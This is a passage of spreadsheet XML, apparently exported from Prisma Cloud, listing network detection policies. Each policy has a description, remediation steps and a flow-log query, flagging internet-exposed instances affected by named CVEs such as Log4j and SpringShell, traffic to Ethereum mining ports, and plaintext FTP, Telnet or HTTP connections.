      <c r="C3506" s="2" t="inlineStr"/>
      <c r="D3506" t="inlineStr"/>
      <c r="E3506" t="inlineStr"/>
      <c r="F3506" t="inlineStr"/>
      <c r="G3506" t="b">
        <v>0</v>
      </c>
      <c r="H350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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3506" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3506" t="inlineStr">
        <is>
          <t>Instance affected by Apache Log4j vulnerability is exposed to network traffic from the internet [CVE-2021-44228]</t>
        </is>
      </c>
      <c r="L3506" t="inlineStr"/>
      <c r="M3506" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3506" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3506" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3506" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3506" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3506" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3506" t="inlineStr"/>
      <c r="T3506" t="b">
        <v>0</v>
      </c>
      <c r="U3506" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3506" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3506" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Apache Log4j version vulnerable for arbitrary code execution (CVE-2021-44228) and exposed to network traffic from the internet. It is recommended to upgrade the Apache Log4j version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3506"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Apache Log4j related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Apache Log4j related services then upgrade Apache Log4j to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3506" t="inlineStr"/>
      <c r="Z3506" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2021-44228')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3506" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB3506" t="inlineStr">
        <is>
          <t>2024-11-13 23:46:03</t>
        </is>
      </c>
      <c r="AC3506" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-822</t>
        </is>
      </c>
      <c r="AD3506" t="b">
        <v>1</v>
      </c>
      <c r="AE3506" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3506" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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6" t="inlineStr">
        <is>
          <t>f993db93-e6ce-4c3f-afd6-35f97a9086ab</t>
        </is>
      </c>
      <c r="AI3506" t="inlineStr">
        <is>
          <t>e406496d-f253-478e-a639-29ea5128f1c2</t>
        </is>
      </c>
      <c r="AJ3506" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3506" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3507">
      <c r="A3507" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3507" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3507" s="2" t="inlineStr"/>
      <c r="D3507" t="inlineStr"/>
      <c r="E3507" t="inlineStr"/>
      <c r="F3507" t="inlineStr"/>
      <c r="G3507" t="b">
        <v>1</v>
      </c>
      <c r="H350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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3507" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3507" t="inlineStr">
        <is>
          <t>Instance affected by Spring Cloud Function SpringShell vulnerability is exposed to network traffic from the internet [CVE-2022-22963]</t>
        </is>
      </c>
      <c r="L3507" t="inlineStr"/>
      <c r="M3507" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3507" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3507" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3507" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3507" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3507" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3507" t="inlineStr"/>
      <c r="T3507" t="b">
        <v>0</v>
      </c>
      <c r="U3507" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3507" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3507" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with the Spring Cloud Function version vulnerable to arbitrary code execution (CVE-2022-22963) and exposed to network traffic from the internet. It is recommended to upgrade the Spring Cloud Function version to the latest version and limit exposure to the internet.
For details refer:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3507" t="inlineStr">
        <is>
          <t>1. Log in to the Cloud Console
2. Review the identified instance and investigate the network traffic.
3. Log in to the host and make sure that there are no processes running that indicate a potential compromise.
4. If this instance is not authorized to process or host Spring Cloud Function related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Spring Cloud Function related services then upgrade Spring Cloud Function version to latest to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3507" t="inlineStr"/>
      <c r="Z3507" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND source.resource IN (resource where finding.type IN ( 'Host Vulnerability' ) AND finding.source IN ( 'Prisma Cloud' ) AND finding.name IN ('CVE-2022-22963')) AND destination.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3507" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3507" t="inlineStr">
        <is>
          <t>2023-07-20 17:53:49</t>
        </is>
      </c>
      <c r="AC3507" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-961</t>
        </is>
      </c>
      <c r="AD3507" t="b">
        <v>1</v>
      </c>
      <c r="AE3507" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3507" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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7" t="inlineStr">
        <is>
          <t>43f0f86f-022e-4c61-b6eb-375f4e330188</t>
        </is>
      </c>
      <c r="AI3507" t="inlineStr">
        <is>
          <t>7c2a8051-e9b4-4457-b836-4fcf04f45b16</t>
        </is>
      </c>
      <c r="AJ3507" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3507" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3508">
      <c r="A3508" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3508" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3508" s="2" t="inlineStr"/>
      <c r="D3508" t="inlineStr"/>
      <c r="E3508" t="inlineStr"/>
      <c r="F3508" t="inlineStr"/>
      <c r="G3508" t="b">
        <v>1</v>
      </c>
      <c r="H350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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3508" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3508" t="inlineStr">
        <is>
          <t>Instance affected by OMIGOD vulnerability is exposed to network traffic from the internet [CVE-2021-38647]</t>
        </is>
      </c>
      <c r="L3508" t="inlineStr"/>
      <c r="M3508" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3508" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3508" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3508" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3508" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3508" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3508" t="inlineStr">
        <is>
          <t>Prisma_Cloud,Policy Status Review</t>
        </is>
      </c>
      <c r="T3508" t="b">
        <v>0</v>
      </c>
      <c r="U3508" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3508" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3508" t="inlineStr">
        <is>
          <t>This policy identifies VM instances installed with Open Management Infrastructure (OMI) version vulnerable for remote code execution (CVE-2021-38647) vulnerability also known as OMIGOD Vulnerability and exposed to network traffic from the internet. It is recommended to upgrade the OMI version to the latest  and limit exposure to the internet.
For details refer: 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-38647
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3508"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OMI related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use OMI related services then upgrade OMI to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3508" t="inlineStr"/>
      <c r="Z3508" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2021-38647')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3508" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3508" t="inlineStr">
        <is>
          <t>2023-07-20 17:54:10</t>
        </is>
      </c>
      <c r="AC3508" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-876</t>
        </is>
      </c>
      <c r="AD3508" t="b">
        <v>1</v>
      </c>
      <c r="AE3508" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3508" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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8" t="inlineStr">
        <is>
          <t>b733cb8c-5e14-4831-85ec-1517f6b3e0cd</t>
        </is>
      </c>
      <c r="AI3508" t="inlineStr">
        <is>
          <t>ba75afe5-3f5c-4355-bc26-ad93583c7648</t>
        </is>
      </c>
      <c r="AJ3508" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3508" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3509">
      <c r="A3509" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3509" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3509" s="2" t="inlineStr"/>
      <c r="D3509" t="inlineStr"/>
      <c r="E3509" t="inlineStr"/>
      <c r="F3509" t="inlineStr"/>
      <c r="G3509" t="b">
        <v>1</v>
      </c>
      <c r="H350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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3509" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3509" t="inlineStr">
        <is>
          <t>Instance affected by Linux kernel container escape vulnerability is exposed to network traffic from the internet [CVE-2022-0185]</t>
        </is>
      </c>
      <c r="L3509" t="inlineStr"/>
      <c r="M3509" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3509" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3509" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3509" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3509" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3509" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3509" t="inlineStr"/>
      <c r="T3509" t="b">
        <v>0</v>
      </c>
      <c r="U3509" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3509" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3509" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with Linux kernel container escape version vulnerable for CVE-2022-0185 and exposed to network traffic from the internet. It is recommended to upgrade the Linux kernel container escape version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0185
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3509"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Linux kernel container escape related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use Linux kernel container escape related services then upgrade Linux kernel container escape to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3509" t="inlineStr"/>
      <c r="Z3509" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2022-0185')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3509" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3509" t="inlineStr">
        <is>
          <t>2023-07-20 18:06:44</t>
        </is>
      </c>
      <c r="AC3509" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-949</t>
        </is>
      </c>
      <c r="AD3509" t="b">
        <v>1</v>
      </c>
      <c r="AE3509" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3509" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG350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09" t="inlineStr">
        <is>
          <t>01000c2f-f3dd-466c-971b-c48845a2efed</t>
        </is>
      </c>
      <c r="AI3509" t="inlineStr">
        <is>
          <t>195a9fbd-7b1a-46cd-9e67-d1d3c21a6a70</t>
        </is>
      </c>
      <c r="AJ3509" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3509" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3510">
      <c r="A3510" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v6.3 [Deprecated], NIST CSF v2.0, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v8.2 [Deprecated], NIST CSF, NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), MITRE ATT&amp;CK v6.3 [Deprecated], CCPA 2018, PIPEDA, NIST CSF</t>
        </is>
      </c>
      <c r="B3510" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3510" s="2" t="inlineStr"/>
      <c r="D3510" t="inlineStr"/>
      <c r="E3510" t="inlineStr"/>
      <c r="F3510" t="inlineStr"/>
      <c r="G3510" t="b">
        <v>1</v>
      </c>
      <c r="H351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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3510" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3510" t="inlineStr">
        <is>
          <t>Instance is communicating with ports known to mine Ethereum</t>
        </is>
      </c>
      <c r="L3510" t="inlineStr"/>
      <c r="M3510" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3510" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3510" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3510" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3510" t="inlineStr">
        <is>
          <t>DE</t>
        </is>
      </c>
      <c r="R3510" t="inlineStr">
        <is>
          <t>DE.AE-1</t>
        </is>
      </c>
      <c r="S3510" t="inlineStr">
        <is>
          <t>Network</t>
        </is>
      </c>
      <c r="T3510" t="b">
        <v>0</v>
      </c>
      <c r="U3510" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3510" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3510" t="inlineStr">
        <is>
          <t>This policy identifies network traffic from internal workloads to the known Ethereum ports 8545 and 30303. Unless this traffic is part of authorized applications and processes, your instances may have been compromised.
Note: This policy alerts AWS and GCP workloads correctly and for Azure, it may trigger alerts for NAT Gateway configured resources also.</t>
        </is>
      </c>
      <c r="X3510" t="inlineStr">
        <is>
          <t>1. Log in to the Cloud Console
2. Review the identified instance and investigate the network traffic to make sure there is sufficient volume of egress traffic to indicate a compromise.
3. Log in to the host and make sure that there are no processes running that indicate a potential compromise.
4. If this instance is not authorized to process or host cryptocurrency related services, terminate the services and change the ACL to block outgoing traffic to port 8545,30303.</t>
        </is>
      </c>
      <c r="Y3510" t="inlineStr"/>
      <c r="Z3510" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where dest.port IN (8545,30303) and dest.publicnetwork IN ('Internet IPs' , 'Suspicious IPs' ) and src.resource IN ( resource where role not in ( 'AWS NAT Gateway', 'AWS ELB', 'AZURE ELB', 'GCP ELB')) AND accepted.bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3510" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3510" t="inlineStr">
        <is>
          <t>2023-04-14 05:48:11</t>
        </is>
      </c>
      <c r="AC3510" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-92</t>
        </is>
      </c>
      <c r="AD3510" t="b">
        <v>1</v>
      </c>
      <c r="AE3510" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3510" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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0" t="inlineStr">
        <is>
          <t>d9153688-38cb-45d9-af12-4077a37d2c9b</t>
        </is>
      </c>
      <c r="AI3510" t="inlineStr">
        <is>
          <t>5b9ef8da-bb08-4735-8821-508e1d785d88</t>
        </is>
      </c>
      <c r="AJ3510" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3510" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3511">
      <c r="A3511" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3511" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3511" s="2" t="inlineStr"/>
      <c r="D3511" t="inlineStr"/>
      <c r="E3511" t="inlineStr"/>
      <c r="F3511" t="inlineStr"/>
      <c r="G3511" t="b">
        <v>1</v>
      </c>
      <c r="H351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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3511" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3511" t="inlineStr">
        <is>
          <t>Instance affected by OpenSSL X.509 email address 4-Byte BOF (Spooky SSL) vulnerability is exposed to network traffic from the internet [CVE-2022-3602]</t>
        </is>
      </c>
      <c r="L3511" t="inlineStr"/>
      <c r="M3511" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3511" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3511" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3511" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3511" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3511" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3511" t="inlineStr"/>
      <c r="T3511" t="b">
        <v>0</v>
      </c>
      <c r="U3511" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3511" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3511" t="inlineStr">
        <is>
          <t>This policy identifies instances installed with OpenSSL version vulnerable for Spooky SSL: OpenSSL X.509 email address 4-Byte buffer overflow vulnerability [CVE-2022-3602] and exposed to network traffic from the internet. It is recommended to upgrade the OpenSSL version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3602
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3511"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OpenSSL related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use OpenSSL related services then upgrade OpenSSL to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3511" t="inlineStr"/>
      <c r="Z3511" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN ( resource where finding.type IN ( 'Host Vulnerability' ) AND finding.source IN ( 'Prisma Cloud' ) AND finding.name IN ('CVE-2022-3602') ) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3511" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3511" t="inlineStr">
        <is>
          <t>2023-07-20 18:09:15</t>
        </is>
      </c>
      <c r="AC3511" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-957</t>
        </is>
      </c>
      <c r="AD3511" t="b">
        <v>1</v>
      </c>
      <c r="AE3511" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3511" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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1" t="inlineStr">
        <is>
          <t>7dfbb326-0276-4bac-bc11-d43a71e7bed5</t>
        </is>
      </c>
      <c r="AI3511" t="inlineStr">
        <is>
          <t>1c80032f-fa90-434e-8feb-cfb92a39b794</t>
        </is>
      </c>
      <c r="AJ3511" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3511" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3512">
      <c r="A3512" t="inlineStr">
        <is>
          <t>NIST CSF v2.0, PCI DSS v3.2.1, GDPR, NIST CSF, MITRE ATT&amp;CK v8.2 [Deprecated], SOC 2, NIST CSF, NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), jbrox - GDPR, PIPEDA, NIST CSF</t>
        </is>
      </c>
      <c r="B3512" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C3512" s="2" t="inlineStr"/>
      <c r="D3512" t="n">
        <v>0</v>
      </c>
      <c r="E3512" t="n">
        <v>0</v>
      </c>
      <c r="F3512" t="n">
        <v>6</v>
      </c>
      <c r="G3512" t="b">
        <v>1</v>
      </c>
      <c r="H351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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3512" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3512" t="inlineStr">
        <is>
          <t>Internet connectivity via TCP over insecure port</t>
        </is>
      </c>
      <c r="L3512" t="inlineStr"/>
      <c r="M3512" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3512" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3512" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3512" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3512" t="inlineStr">
        <is>
          <t>Chapter 5</t>
        </is>
      </c>
      <c r="R3512" t="inlineStr">
        <is>
          <t>Article 46</t>
        </is>
      </c>
      <c r="S3512" t="inlineStr">
        <is>
          <t>PCI DSS v3.2</t>
        </is>
      </c>
      <c r="T3512" t="b">
        <v>0</v>
      </c>
      <c r="U3512" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3512" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3512" t="inlineStr">
        <is>
          <t>This policy identifies network traffic coming from the internet which is plain text FTP, Telnet, or HTTP. It is recommended to have Security Group/Firewall Rule for the resource that has a more restrictive ACL, which does not permit connection from the internet.
Note: This policy alerts AWS workloads correctly and for Azure and GCP this policy could also trigger alerts for NAT Gateway configured resources.</t>
        </is>
      </c>
      <c r="X3512" t="inlineStr">
        <is>
          <t>1. Log in to the Cloud Console
2. Search for the resource reported in the alert
3. Check if the Security Group/Firewall Rule of the resource indeed allows connections from the internet
4. Assign another Security Group/Firewall Rule to the resource that has a more restrictive ACL, which does not permit connection from the internet</t>
        </is>
      </c>
      <c r="Y3512" t="inlineStr"/>
      <c r="Z3512" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where src.ip=0.0.0.0 AND protocol='TCP' AND dest.port IN (21,23,80) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs') AND dest.resource IN (resource where role not in ('AWS ELB', 'AWS NAT Gateway', 'AZURE ELB', 'GCP ELB')) AND accepted.bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3512" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3512" t="inlineStr">
        <is>
          <t>2023-04-14 05:48:11</t>
        </is>
      </c>
      <c r="AC3512" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-37</t>
        </is>
      </c>
      <c r="AD3512" t="b">
        <v>1</v>
      </c>
      <c r="AE3512" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3512" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG351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2" t="inlineStr">
        <is>
          <t>cd94c83e-6f84-4a37-a116-13ccba78a615</t>
        </is>
      </c>
      <c r="AI3512" t="inlineStr">
        <is>
          <t>33d85130-385e-405d-a055-b20c2a5fc514</t>
        </is>
      </c>
      <c r="AJ3512" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3512" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3513">
      <c r="A3513" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B3513" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3513" s="2" t="inlineStr"/>
      <c r="D3513" t="inlineStr"/>
      <c r="E3513" t="inlineStr"/>
      <c r="F3513" t="inlineStr"/>
      <c r="G3513" t="b">
        <v>1</v>
      </c>
      <c r="H351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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3513" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3513" t="inlineStr">
        <is>
          <t>Instance affected by SMB DCE/RPC remote code execution vulnerability is exposed to network traffic from the internet [CVE-2022-26809]</t>
        </is>
      </c>
      <c r="L3513" t="inlineStr"/>
      <c r="M3513" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3513" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3513" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3513" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3513" t="inlineStr">
        <is>
          <t>4.1 Network</t>
        </is>
      </c>
      <c r="R3513" t="inlineStr">
        <is>
          <t>4.1.1 Network - All</t>
        </is>
      </c>
      <c r="S3513" t="inlineStr"/>
      <c r="T3513" t="b">
        <v>0</v>
      </c>
      <c r="U3513" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3513" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3513" t="inlineStr">
        <is>
          <t>This policy identifies Instances installed with SMB DCE/RPC version vulnerable for CVE-2022-26809 and exposed to network traffic from the internet. It is recommended to upgrade the SMB DCE/RPC version to the latest version and limit exposure to the internet.
For details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-26809
NOTE: This policy is effective only when Prisma Compute is enabled in your environment.</t>
        </is>
      </c>
      <c r="X3513"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SMB DCE/RPC related services then terminate the services and change the ACL to block the outgoing traffic.
5. If this instance is authorized to use SMB DCE/RPC related services then upgrade SMB DCE/RPC to the latest version to fix this vulnerability.</t>
        </is>
      </c>
      <c r="Y3513" t="inlineStr"/>
      <c r="Z3513" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where bytes &gt; 0 AND dest.resource IN (resource where finding.type IN ('Host Vulnerability') AND finding.source IN ('Prisma Cloud') AND finding.name IN ('CVE-2022-26809')) AND source.publicnetwork IN ('Internet IPs', 'Suspicious IPs')</t>
        </is>
      </c>
      <c r="AA3513" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
